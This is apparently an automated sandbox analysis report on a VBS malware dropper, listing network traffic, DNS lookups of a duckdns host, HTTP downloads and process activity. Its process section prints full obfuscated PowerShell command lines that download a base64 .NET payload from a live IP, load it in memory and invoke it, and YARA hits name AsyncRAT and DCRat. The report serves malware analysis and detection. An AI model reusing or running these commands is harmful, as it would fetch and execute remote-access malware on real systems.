                                            Oct 1, 2024 06:32:00.380201101 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:00.427154064 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:06.645917892 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:06.651891947 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:06.653124094 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:06.658058882 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:06.935607910 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:06.989398003 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:07.061403036 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:07.062181950 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:07.066976070 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:07.067034006 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:32:07.072742939 CEST44554973789.117.23.22192.168.2.4

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 06:30:00.822993040 CEST5043253192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:01.837419987 CEST5043253192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:02.833076000 CEST5043253192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:04.832156897 CEST53504321.1.1.1192.168.2.4
                                            Oct 1, 2024 06:30:04.832178116 CEST53504321.1.1.1192.168.2.4
                                            Oct 1, 2024 06:30:04.832190037 CEST53504321.1.1.1192.168.2.4
                                            Oct 1, 2024 06:30:09.849304914 CEST5542053192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:10.848870039 CEST5542053192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:11.864970922 CEST5542053192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:13.859914064 CEST53554201.1.1.1192.168.2.4
                                            Oct 1, 2024 06:30:13.859946012 CEST53554201.1.1.1192.168.2.4
                                            Oct 1, 2024 06:30:13.859977961 CEST53554201.1.1.1192.168.2.4
                                            Oct 1, 2024 06:30:18.864885092 CEST5677153192.168.2.41.1.1.1
                                            Oct 1, 2024 06:30:18.970983028 CEST53567711.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 1, 2024 06:30:00.822993040 CEST192.168.2.41.1.1.10xc8ceStandard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:01.837419987 CEST192.168.2.41.1.1.10xc8ceStandard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:02.833076000 CEST192.168.2.41.1.1.10xc8ceStandard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:09.849304914 CEST192.168.2.41.1.1.10x1708Standard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:10.848870039 CEST192.168.2.41.1.1.10x1708Standard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:11.864970922 CEST192.168.2.41.1.1.10x1708Standard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:18.864885092 CEST192.168.2.41.1.1.10x7b10Standard query (0)dczas.duckdns.orgA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 1, 2024 06:30:04.832156897 CEST1.1.1.1192.168.2.40xc8ceServer failure (2)dczas.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:04.832178116 CEST1.1.1.1192.168.2.40xc8ceServer failure (2)dczas.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:04.832190037 CEST1.1.1.1192.168.2.40xc8ceServer failure (2)dczas.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:13.859914064 CEST1.1.1.1192.168.2.40x1708Server failure (2)dczas.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:13.859946012 CEST1.1.1.1192.168.2.40x1708Server failure (2)dczas.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:13.859977961 CEST1.1.1.1192.168.2.40x1708Server failure (2)dczas.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                            Oct 1, 2024 06:30:18.970983028 CEST1.1.1.1192.168.2.40x7b10No error (0)dczas.duckdns.org89.117.23.22A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • 91.202.233.169

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.44973091.202.233.169804312C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 06:29:57.026890039 CEST94OUTGET /Tak/Reg/Marz/DRG/RTC/F3dll.txt HTTP/1.1
                                            Host: 91.202.233.169
                                            Connection: Keep-Alive
                                            Oct 1, 2024 06:29:57.720839977 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.20.2
                                            Date: Tue, 01 Oct 2024 04:29:57 GMT
                                            Content-Type: text/plain
                                            Content-Length: 11608
                                            Connection: keep-alive
                                            Last-Modified: Tue, 01 Oct 2024 01:02:34 GMT
                                            ETag: "2d58-6235fe0675e80"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4d 42 4a 2b 32 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 42 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 58 6a 67 41 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 41 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAMBJ+2YAAAAAAAAAAOAAIiALAVAAABoAAAAGAAAAAAAAXjgAAAAgAAAAAAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAw4AABPAAAAAEAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAZBgAAAAgAAAAGgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAQAAAAAQAAAAcAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAIAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABAOAAAAAAAAEgAAAACAAUAbCYAAKARAAABAAAAAAAAALQlAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAAAGAAAAAAAAACgFAAAGKh4CKAEAAAoqAAAbMAcAsQMAAAEAABEAABcNCQVyAQAAcG8CAAAK/gETBBEELGsoAwAAChMFFhMGK1ERBREGmhMHEQdvBAAACm8FAAAKcgUAAHAoBQAACm8CAAAKEQdvBAAACm8FAAAKchcAAHAoBQAACm
                                            Oct 1, 2024 06:29:57.720897913 CEST224INData Raw: 38 43 41 41 41 4b 59 42 4d 49 45 51 67 73 42 54 68 44 41 77 41 41 41 41 41 52 42 68 66 57 45 77 59 52 42 68 45 46 6a 6d 6e 2b 42 42 4d 4a 45 51 6b 74 6f 51 41 44 43 6e 34 47 41 41 41 4b 43 77 4e 7a 42 77 41 41 43 67 77 44 62 77 67 41 41 41 70 76
                                            Data Ascii: 8CAAAKYBMIEQgsBThDAwAAAAARBhfWEwYRBhEFjmn+BBMJEQktoQADCn4GAAAKCwNzBwAACgwDbwgAAApvCQAACnItAABwKAgAAApvAgAAChMKEQosCXI1AABwCwArIwADbwgAAApvCQAACnI/AABwKAgAAApvAgAACiZyRQAAcAsAABcTCxELBXJNAABwbwIAAAr+ARMMEQw5AgEAAAAbjQYAAAElFn
                                            Oct 1, 2024 06:29:57.720928907 CEST1236INData Raw: 4a 52 41 41 42 77 6f 69 55 58 42 4b 49 6c 47 48 49 4f 41 51 42 77 6f 69 55 5a 4b 41 6f 41 41 41 71 69 4a 52 70 79 64 41 45 41 63 4b 49 6f 43 77 41 41 43 68 4d 4e 4b 41 6f 41 41 41 70 79 33 67 45 41 63 43 67 4d 41 41 41 4b 45 51 30 6f 44 51 41 41
                                            Data Ascii: JRAABwoiUXBKIlGHIOAQBwoiUZKAoAAAqiJRpydAEAcKIoCwAAChMNKAoAAApy3gEAcCgMAAAKEQ0oDQAACgBy7gEAcCgKAAAKct4BAHAoDgAAChYWFSgPAAAKJhuNBgAAASUWcokCAHCiJRcDoiUYcr8CAHCiJRkoCgAACqIlGnLhAgBwoigLAAAKFhYVKA8AAAomcuUCAHATDhuNBgAAASUWEQ6iJRdyOQMAcKIlGCgKAAAKo
                                            Oct 1, 2024 06:29:57.720961094 CEST1236INData Raw: 41 41 41 43 6f 41 41 41 41 7a 41 41 41 41 4f 77 41 41 41 42 59 54 42 43 76 63 46 41 73 58 45 77 51 72 31 52 59 4d 47 68 4d 45 4b 38 34 4a 62 79 6b 41 41 41 70 79 4d 41 55 41 63 43 67 71 41 41 41 4b 4c 42 6b 62 45 77 51 72 74 77 59 49 6d 67 30 59
                                            Data Ascii: AAACoAAAAzAAAAOwAAABYTBCvcFAsXEwQr1RYMGhMEK84JbykAAApyMAUAcCgqAAAKLBkbEwQrtwYImg0YEwQrrggsFRkTBCumFisDFysALQQJCysKCBdYDAgGjmky2QcUKCsAAAosAxYrAxcrAC0JBxQUbx8AAAom3gMm3gAqAAEQAAAAAAEAnp8AAwQAAAEeAigBAAAKKrQAAADOyu++AQAAAJEAAABsU3lzdGVtLlJlc291c
                                            Oct 1, 2024 06:29:57.720993996 CEST1236INData Raw: 41 41 6b 51 42 6f 41 50 6f 41 42 77 44 73 4a 41 41 41 41 41 43 52 41 48 34 41 4b 51 45 4a 41 47 49 67 41 41 41 41 41 49 59 59 31 67 4d 58 41 41 6f 41 41 41 41 42 41 42 59 41 41 41 41 43 41 4d 30 43 41 41 41 44 41 45 30 41 41 41 41 45 41 44 30 41
                                            Data Ascii: AAkQBoAPoABwDsJAAAAACRAH4AKQEJAGIgAAAAAIYY1gMXAAoAAAABABYAAAACAM0CAAADAE0AAAAEAD0AAAAFADEAAAAGADcAAAABAF8AAAACAGgAAAABAF8ACQDWAxcAMQDjBEIAGQCrBEcAGQDXAE0AMQCeA00AMQB+BVEAEQDWA1QAMQCsA00AMQAJA00AOQDBAlkAMQD0BF0AMQD0BGMAQQA9BWkAMQD0BG8ASQDnAnYAE
                                            Oct 1, 2024 06:29:57.721028090 CEST1236INData Raw: 4e 70 59 6d 78 6c 51 58 52 30 63 6d 6c 69 64 58 52 6c 41 45 46 7a 63 32 56 74 59 6d 78 35 56 47 6c 30 62 47 56 42 64 48 52 79 61 57 4a 31 64 47 55 41 51 58 4e 7a 5a 57 31 69 62 48 6c 55 63 6d 46 6b 5a 57 31 68 63 6d 74 42 64 48 52 79 61 57 4a 31
                                            Data Ascii: NpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc
                                            Oct 1, 2024 06:29:57.721061945 CEST896INData Raw: 64 7a 41 45 4e 76 62 6e 52 68 61 57 35 7a 41 46 42 79 62 32 4e 6c 63 33 4d 41 51 32 39 75 59 32 46 30 41 45 39 69 61 6d 56 6a 64 41 42 54 65 58 4e 30 5a 57 30 75 54 6d 56 30 41 45 56 34 61 58 51 41 54 58 4e 6e 51 6d 39 34 55 6d 56 7a 64 57 78 30
                                            Data Ascii: dzAENvbnRhaW5zAFByb2Nlc3MAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AEV4aXQATXNnQm94UmVzdWx0AFdlYkNsaWVudABDb252ZXJ0AFN5c3RlbS5UZXh0AFdyaXRlQWxsVGV4dABNc2dCb3gAZ2V0X0xvYWRlZEFzc2VtYmx5AG9wX0VxdWFsaXR5AG9wX0luZXF1YWxpdHkARW1wdHkAAAM0AAARdgBtAHQAbwBvAGwAc
                                            Oct 1, 2024 06:29:57.721093893 CEST1236INData Raw: 67 41 5a 51 42 73 41 47 77 41 4c 67 42 6c 41 48 67 41 5a 51 41 67 41 46 4d 41 5a 51 42 30 41 43 30 41 52 51 42 34 41 47 55 41 59 77 42 31 41 48 51 41 61 51 42 76 41 47 34 41 55 41 42 76 41 47 77 41 61 51 42 6a 41 48 6b 41 49 41 42 43 41 48 6b 41
                                            Data Ascii: gAZQBsAGwALgBlAHgAZQAgAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAC0AUwBjAG8AcABlACAAUAByAG8AYwBlAHMAcwAgADsAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBmAGkAbABlACAAATVwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABDAG8AcAB5AC0AS
                                            Oct 1, 2024 06:29:57.721126080 CEST1236INData Raw: 34 45 49 41 45 42 44 67 4d 41 41 41 34 46 41 41 45 4f 48 51 34 46 41 41 49 4f 44 67 34 46 41 41 49 42 44 67 34 47 41 41 4d 4f 44 67 34 4f 43 41 41 45 43 41 34 52 4b 51 49 49 42 51 41 42 41 52 49 52 42 51 41 42 41 52 45 31 42 41 41 41 45 6a 6b 46
                                            Data Ascii: 4EIAEBDgMAAA4FAAEOHQ4FAAIODg4FAAIBDg4GAAMODg4OCAAECA4RKQIIBQABARIRBQABARE1BAAAEjkFIAEBEjkEAAEODgQgAQ4OBSACDg4OBAAAEkEFAAEdBQ4GIAESSR0FBSABEk0OBSABElEOBiACHBwdHAgAAxFZHBFdHAkABgEODg4ODg4CBhwCBggEAAEBHAUgAgEcGAUgAQESZQQgABJJBgACARwSaQsHBR0SURJRC
                                            Oct 1, 2024 06:29:57.721159935 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 51 41 41 41 41
                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAA8AwAAAAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAA
                                            Oct 1, 2024 06:29:57.726119041 CEST870INData Raw: 42 6c 41 48 49 41 63 77 42 70 41 47 38 41 62 67 41 41 41 44 45 41 4c 67 41 77 41 43 34 41 4d 41 41 75 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                            Data Ascii: BlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAADAAAAGA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                            Oct 1, 2024 06:29:57.808377028 CEST69OUTGET /Tak/Reg/Marz/DRG/RTC/F3Pe.txt HTTP/1.1
                                            Host: 91.202.233.169
                                            Oct 1, 2024 06:29:58.030160904 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.20.2
                                            Date: Tue, 01 Oct 2024 04:29:57 GMT
                                            Content-Type: text/plain
                                            Content-Length: 57008
                                            Connection: keep-alive
                                            Last-Modified: Tue, 01 Oct 2024 00:53:45 GMT
                                            ETag: "deb0-6235fc0df7840"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Data Raw: e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 82 e3 81 [TRUNCATED]
                                            Data Ascii:
                                            Oct 1, 2024 06:29:58.156641006 CEST65OUTGET /Tak/Reg/Marz/ENVS/DJ1.txt HTTP/1.1
                                            Host: 91.202.233.169
                                            Oct 1, 2024 06:29:58.377931118 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.20.2
                                            Date: Tue, 01 Oct 2024 04:29:58 GMT
                                            Content-Type: text/plain
                                            Content-Length: 64856
                                            Connection: keep-alive
                                            Last-Modified: Mon, 30 Sep 2024 04:20:53 GMT
                                            ETag: "fd58-6234e87cc5340"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                            Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:00:29:53
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                            Imagebase:0x7ff7aa200000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:00:29:54
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:00:29:54
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:3
                                            Start time:00:29:55
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
                                            Imagebase:0x7ff788560000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000003.00000002.1707124383.000001851CFD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:00:29:57
                                            Start date:01/10/2024
